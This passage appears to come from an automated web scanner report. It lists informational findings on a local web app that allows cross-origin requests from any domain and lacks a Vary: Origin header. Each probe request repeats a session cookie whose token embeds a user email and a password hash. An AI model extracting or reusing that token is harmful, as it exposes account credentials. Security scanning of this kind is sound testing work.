The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qecveszgwcyt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-translate/angular-translate.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://qecveszgwcyt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 06 Dec 2016 18:56:59 GMT
ETag: W/"5cb5-158d57efc78"
Content-Type: application/javascript
Content-Length: 23733
Date: Sun, 15 Jan 2017 21:12:09 GMT
Connection: close

/*!
* angular-translate - v2.13.1 - 2016-12-06
*
* Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
*/
!function(a,b){"function"==typeof define&&define.amd?define([],fun
...[SNIP]...
2.25. http://192.168.61.143:3000/bower_components/angular/angular.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular/angular.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zxptqasoicfp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular/angular.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zxptqasoicfp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
ETag: W/"27d70-159073e17f8"
Content-Type: application/javascript
Content-Length: 163184
Date: Sun, 15 Jan 2017 21:10:53 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(y){'use strict';function G(a,b){b=b||Error;return function(){var d=arguments[0],c;c="["+(a?a+":":"")+d
...[SNIP]...
2.26. http://192.168.61.143:3000/bower_components/bootstrap/dist/js/bootstrap.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/bootstrap/dist/js/bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://aylglocmxnue.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://aylglocmxnue.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 25 Jul 2016 15:51:55 GMT
ETag: W/"90b5-15622c16578"
Content-Type: application/javascript
Content-Length: 37045
Date: Sun, 15 Jan 2017 21:12:15 GMT
Connection: close

/*!
* Bootstrap v3.3.7 (http://getbootstrap.com)
* Copyright 2011-2016 Twitter, Inc.
* Licensed under the MIT license
*/
if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requi
...[SNIP]...
2.27. http://192.168.61.143:3000/bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://sfubtskhhcvo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/bootswatch/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Referer: http://192.168.61.143:3000/bower_components/bootswatch/slate/bootstrap.min.css
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://sfubtskhhcvo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 30 Jul 2016 21:56:26 GMT
ETag: W/"466c-1563dceeb10"
Content-Type: application/font-woff2
Content-Length: 18028
Date: Sun, 15 Jan 2017 21:16:10 GMT
Connection: close

wOF2......Fl.......\..F    ...M....................?FFTM.. .`..r....
..$..e.6.$..t..0.. .."..Q?webf..e.5.....@..?...
... ..t............,3+.2q.F..YO...&>...b.m.5.Z..H$..Y....{.H    jd.......%....y"......+
...[SNIP]...
2.28. http://192.168.61.143:3000/bower_components/clipboard/dist/clipboard.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/clipboard/dist/clipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://woivpcowxrqt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://woivpcowxrqt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 12 Dec 2016 13:54:35 GMT
ETag: W/"282e-158f3504978"
Content-Type: application/javascript
Content-Length: 10286
Date: Sun, 15 Jan 2017 21:12:19 GMT
Connection: close

/*!
* clipboard.js v1.5.16
* https://zenorocha.github.io/clipboard.js
*
* Licensed MIT .. Zeno Rocha
*/
!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();els
...[SNIP]...
2.29. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/jquery/dist/jquery.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://cehbxtdgripw.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://cehbxtdgripw.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
ETag: W/"1499c-14d00c472c0"
Content-Type: application/javascript
Content-Length: 84380
Date: Sun, 15 Jan 2017 21:12:36 GMT
Connection: close

/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
...[SNIP]...
2.30. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/moment/min/moment.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ryjgflxoaziq.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/moment/min/moment.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://ryjgflxoaziq.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sun, 04 Dec 2016 05:41:33 GMT
ETag: W/"ef85-158c85a06c8"
Content-Type: application/javascript
Content-Length: 61317
Date: Sun, 15 Jan 2017 21:12:42 GMT
Connection: close

//! moment.js
//! version : 2.17.1
//! authors : Tim Wood, Iskren Chernev, Moment.js contributors
//! license : MIT
//! momentjs.com
!function(a,b){"object"==typeof exports&&"undefined"!=typeof module
...[SNIP]...
2.31. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/ng-file-upload/ng-file-upload-shim.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zrmkxhgxtufr.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zrmkxhgxtufr.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
ETag: W/"1c5e-15832c0e460"
Content-Type: application/javascript
Content-Length: 7262
Date: Sun, 15 Jan 2017 21:12:36 GMT
Connection: close

/*! 12.2.13 */
!function(){function a(a,b){window.XMLHttpRequest.prototype[a]=b(window.XMLHttpRequest.prototype[a])}function b(a,b,c){try{Object.defineProperty(a,b,{get:c})}catch(d){}}if(window.FileAP
...[SNIP]...
2.32. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/ng-file-upload/ng-file-upload.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qarigobwuqby.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://qarigobwuqby.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
ETag: W/"9277-15832c0e460"
Content-Type: application/javascript
Content-Length: 37495
Date: Sun, 15 Jan 2017 21:12:48 GMT
Connection: close

/*! 12.2.13 */
!window.XMLHttpRequest||window.FileAPI&&FileAPI.shouldLoad||(window.XMLHttpRequest.prototype.setRequestHeader=function(a){return function(b,c){if("__setXHR_"===b){var d=c(this);d instan
...[SNIP]...
2.33. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/ngclipboard/dist/ngclipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://fxcklcgejfzo.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://fxcklcgejfzo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 26 Feb 2016 02:29:26 GMT
ETag: W/"280-1531b68cb70"
Content-Type: application/javascript
Content-Length: 640
Date: Sun, 15 Jan 2017 21:12:40 GMT
Connection: close

/*! ngclipboard - v1.1.1 - 2016-02-26
* https://github.com/sachinchoolur/ngclipboard
* Copyright (c) 2016 Sachin; Licensed MIT */
!function(){"use strict";var a,b,c="ngclipboard";"object"==typeof modu
...[SNIP]...
2.34. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/qrcode-generator/js/qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mbctsgjzwqam.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://mbctsgjzwqam.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 29 Mar 2016 13:26:04 GMT
ETag: W/"afce-153c28d75e0"
Content-Type: application/javascript
Content-Length: 45006
Date: Sun, 15 Jan 2017 21:12:52 GMT
Connection: close

//---------------------------------------------------------------------
//
// QR Code Generator for JavaScript
//
// Copyright (c) 2009 Kazuhiko Arase
//
// URL: http://www.d-project.com/
//
// Licens
...[SNIP]...
2.35. http://192.168.61.143:3000/bower_components/underscore/underscore.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/underscore/underscore.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dnwhusulvoxp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/underscore/underscore.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://dnwhusulvoxp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Thu, 02 Apr 2015 15:32:01 GMT
ETag: W/"ceb7-14c7ac2ad68"
Content-Type: application/javascript
Content-Length: 52919
Date: Sun, 15 Jan 2017 21:12:52 GMT
Connection: close

// Underscore.js 1.8.3
// http://underscorejs.org
// (c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
// Underscore may be freely distributed under th
...[SNIP]...
2.36. http://192.168.61.143:3000/css/app.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /css/app.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

